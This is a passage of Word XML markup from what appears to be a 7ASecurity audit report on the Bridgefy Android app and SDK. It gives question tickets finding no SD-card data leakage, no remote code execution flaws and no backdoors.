      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q9: Is data dumped in the SD Card from where it could be retrieved later without even entering the PIN to unlock the device?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During the code review and dynamic analysis of the Bridgefy Android mobile app and SDK, no evidence could be identified to suggest that the mobile application will save sensitive data on the SD Card.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This being said, user trust may additionally be improved by extrapolating the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250004" w:id="51"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q10:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>seems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unclear</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="374" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q10: Do the apps/SDK/servers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>lead to RCE in any way?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity did not identify any vulnerability that could lead to RCE either directly or indirectly during this engagement. Specifically, no RCE weaknesses were found in the source code provided by Bridgefy, the embedded binaries in the mobile apps or the underlying third-party dependencies in use (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-002</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This being said, user trust may additionally be improved by extrapolating the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250003" w:id="52"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q11:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Backdoors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unclear</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q11:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apps/SDK/servers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>backdoor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The 7ASecurity team was unable to identify any backdoors in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>provided by Bridgefy, as well as the underlying dependencies and binaries reviewed during this engagement. In short, no backdoor signs were found within any Bridgefy component at runtime or at rest. Please note tests in this regard were as comprehensive as possible, within the budget constraints of this exercise. Specifically, all common backdoor mechanisms were checked, including suspicious file access, unexpected back-connect attempts, execution of operating system commands and exfiltration attempts of obfuscated content, to name a few.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This being said, user trust may additionally be improved by extrapolating the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250002" w:id="53"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q12:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>seems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>PrivEsc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Artifacts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
